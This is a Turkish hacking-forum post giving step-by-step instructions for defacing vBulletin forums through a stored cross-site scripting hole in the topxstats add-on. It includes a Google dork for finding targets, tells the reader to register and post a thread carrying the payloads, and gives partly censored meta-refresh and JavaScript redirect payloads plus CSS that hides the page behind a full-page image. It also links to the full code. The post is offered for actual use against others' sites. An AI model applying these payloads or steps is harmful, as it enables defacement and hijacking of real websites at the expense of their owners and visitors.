vbulletin index Basma !!

!! BLOKE !!

Katılımcı Üye
26 Şub 2009
535
0
OFL!Ne
bu açıkla vbulletin sitelerine index i basabiliosunuz.

öncelikle google arama kodu:

inurl:"topxstats"
inurl:topxstats.php


arattıktan sonra bir foruma üye oluyoruz.

sonra konu açıyoruz. konumuzun başlığına veya içine vereceğim kodları yapştırıyoruz.Bu kod siteyi yönlendirmeye yarayacak.

eğer kodu yazdığınız gibi başlkıkta ya da mesajda görebiliyorsanız sorun yok.

ama eğer kod sansürlenmiş ise işe yaramaz. yani kodlar **** biçiminde ise işe yaramaz direk yazdığınız gibi grnmeli:)

yönlendirme için free host çok bir tane alrsınız cute ftp filezilla gibi ftp programlarıyla index inizi upload edersiniz programlar için google ye bakabilirsiniz.

neyse çok uzattım kodlar:

Kod:

">"">>>>****** **********="Refresh" *********"0;url=siteniz.***"> """" >Kod:

">">>******** LANGUAGE="JavaScript"> window.********="siteniz.***"; </script>"">tam sayfa resim döşemek için de

Kod:

<body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url('resminizin adresi');}http://rapidshare.com/files/18202371/kodlar.txt.html

modify_inline.gif
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.